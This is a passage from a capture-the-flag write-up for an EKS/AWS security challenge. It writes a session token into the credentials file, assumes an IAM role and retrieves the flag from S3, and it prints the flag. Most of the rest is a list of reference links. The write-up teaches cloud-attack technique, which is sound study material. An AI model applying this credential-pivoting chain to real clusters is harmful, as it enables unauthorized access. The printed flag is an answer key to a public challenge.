echo "aws_session_token = IQoJb3JpZ2luX2VjEOz//////////wEaCXVzLXdlc3QtMSJIMEYCIQCk1qJGYAf5fic/6XZ08OeVmRPPnrfyftDQwH/mJE03kQIhAPhwKcHtbXSFambfgAIPGwSu+H+Ds6l7hCb1Bgt7jbJsKroECHUQABoMNjg4NjU1MjQ2NjgxIgw1sDbG9rHyXc/e3QoqlwRficlydMRZhiAt8DU4mBC3IXO87p3SqSCdzCs2qeic0A1Rx43+UN0IL0T0WiLpvHKo1+MCikStA0OuxGCuK+paBdmISQdw6XxxvMof+qzmyA/ntxajmkeYmAuqU2bx2jzHk8Q2wefD/1I+utp5BJLleGbVDxaO1kongQaLWjfFKwwJKdgos4PVey85BZoX24haobEcYSYfTZXtiuWpj3gU+Z+P4MA+c4aWsYZHxStE5XMGWf45Oki5gdsgiwznfvd+vBTWD8Zk17efJ0rGmADslPlfH0x29vqQgBSRg2+v1+JzXBehafZVgcobx910tNjy1EyKXuFIa4y2wtGPUNXrK8a9edoonePrqXQWJZzgphh8PXQsngGIbG1iTt4T78VzOYHWby9AyPpG5p/bVQ0l9ZAbag3rRYpBOyItWQvWRd2Jp+s3Zgv22Is8DZBOl7hUH5mshBQRWRjY9UUMeuSmWxyL617D3YaNmYRER6nn0EsLLd8LG863uLE5VYrGeuOSaZmvFIhmmxxLzyyr1uzngM3gr/LOt8ExKmHkQcAoDnX/JQts1Q9uuoNlc3Wr0OUZ18mWaVGg9RBHLc3uYbrk0CSZXItx7D/IJTiaJzZ/SHnFnw81AikUuk8e4cSGWhpagjIvqH9jS1NmMwuDHpcBs7sVO6qU5HQ5Oht75p3HOVq8Q0cvH/NPXW8iTN5NU9Zy9m5jJWZbMOrdpawGOpQBmiwUu2AW8lqnaI7sEGQvuUCJ/ACBRmEUj7j6rNMVVEH4S7kYOhcwbTLrHP4xoeFAk9hNHq29PIB3CHS0n7EOjkAgqwSFH7Bg2l3X+Z6JDOr07if0HeJPHkE1MwxILO03HooJHAiF7b/wBlMompCbZuf/po/e5lU2WL5pFcXO+GCAj3Qy6nlRR5RVx269ewK7qWefqQ==" >> .aws/credentials

aws sts get-caller-identity --profile default
{
    "UserId": "AROA2AVYNEVMZEZ2AFVYI:something",
    "Account": "688655246681",
    "Arn": "arn:aws:sts::688655246681:assumed-role/challengeEksS3Role/something"
}

Note that we will need to use --profile default as there are already credentials being set in the environment variable, which will take precendence if we dont call a profile.

Retrieving the flag

aws s3api get-object --bucket challenge-flag-bucket-3ff1ae2 --key flag flag.txt --profile default  
{
    "AcceptRanges": "bytes",
    "LastModified": "2023-11-01T12:27:55+00:00",
    "ContentLength": 72,
    "ETag": "\"5479da5a2fc031f6a9941a0ed1e1bde9\"",
    "ContentType": "binary/octet-stream",
    "ServerSideEncryption": "AES256",
    "Metadata": {}
}

cat flag.txt 
wiz_eks_challenge{w0w_y0u_really_are_4n_eks_and_aws_exp1oitation_legend}

Reference:

Based on the , the syntax for crane auth login

We are able to then and the docker container tarball

We can see the image container is which is hosted on AWS ECR.

Looking at , I found a few command interesting and decided to perform those enumeration.

And upon base64 decoding, we get the username and the password token. The command will automatically retrieve the authentication token.

Looking at the reference page, we found a few interesting commands, namely the describe-cluster, list-cluster and get-token. We do not have permission to run both describe and list cluster, but am able to retrieve a token using get-token

I tried to update the kubeconfig file following this guide, but was facing some issues. Then, I saw another stackoverflow question to show how to directly use the with kubectl without configuring the kubeconfig file.

Doing some research leads me down to this user guide by . Theres also a section on that showcases this technique. So lets try and assume the role based on the policy file above. Note that I will need to renegerate the token according the the trust policy file, where the token audience has to be sts.amazonaws.com

https://cloud.hacktricks.xyz/pentesting-cloud/kubernetes-security/kubernetes-enumeration#get-current-privileges
https://cloud.hacktricks.xyz/pentesting-cloud/kubernetes-security/kubernetes-enumeration#get-secrets
documentation
list
pull
https://www.wiz.io/blog/brokensesame-accidental-write-permissions-to-private-registry-allowed-potential-r
https://www.wiz.io/blog/hells-keychain-supply-chain-attack-in-ibm-cloud-databases-for-postgresql
https://cloud.hacktricks.xyz/pentesting-cloud/kubernetes-security/kubernetes-enumeration#get-pods
https://kubernetes.io/docs/reference/kubernetes-api/workload-resources/pod-v1/#containers
https://kubernetes.io/docs/concepts/containers/images/#specifying-imagepullsecrets-on-a-pod
https://github.com/google/go-containerregistry/blob/main/cmd/crane/doc/crane.md
https://github.com/google/go-containerregistry/blob/main/cmd/crane/doc/crane_auth_login.md#crane-auth-login
https://github.com/google/go-containerregistry/blob/main/cmd/crane/doc/crane_ls.md
https://github.com/google/go-containerregistry/blob/main/cmd/crane/doc/crane_pull.md
688655246681.dkr.ecr.us-west-1.amazonaws.com/central_repo-aaf4a7c@sha256:7486d05d33ecb1c6e1c796d59f63a336cfa8f54a3cbc5abf162f533508dd8b01
aws ecr cli reference page
aws ecr get-login-password
https://hackingthe.cloud/aws/exploitation/ec2-metadata-ssrf/
https://docs.aws.amazon.com/cli/latest/reference/ecr/
https://docs.aws.amazon.com/cli/latest/reference/ecr/describe-repositories.html
https://docs.aws.amazon.com/cli/latest/reference/ecr/get-authorization-token.html
aws cli eks
article
token
https://docs.aws.amazon.com/cli/latest/reference/eks/
https://amod-kadam.medium.com/how-does-kubeconfig-works-with-aws-eks-get-token-8a19ff4c5814
https://stackoverflow.com/a/77407767
AWS
hacktricks
https://docs.aws.amazon.com/cli/latest/reference/sts/assume-role-with-web-identity.html
https://cloud.hacktricks.xyz/pentesting-cloud/kubernetes-security/kubernetes-pivoting-to-clouds#workflow-of-iam-role-for-service-accounts-1
EKS Cluster Games
https://www.wiz.io/blog/announcing-the-eks-cluster-games
IAM Policy
Trust Policy
Permissions
https://eksclustergames.com/finisher/amG1RJ0E
https://kubernetes.io/docs/reference/kubernetes-api/workload-resources/pod-v1/#containers
https://kubernetes.io/docs/concepts/containers/images/#specifying-imagepullsecrets-on-a-pod
https://hackingthe.cloud/aws/exploitation/ec2-metadata-ssrf/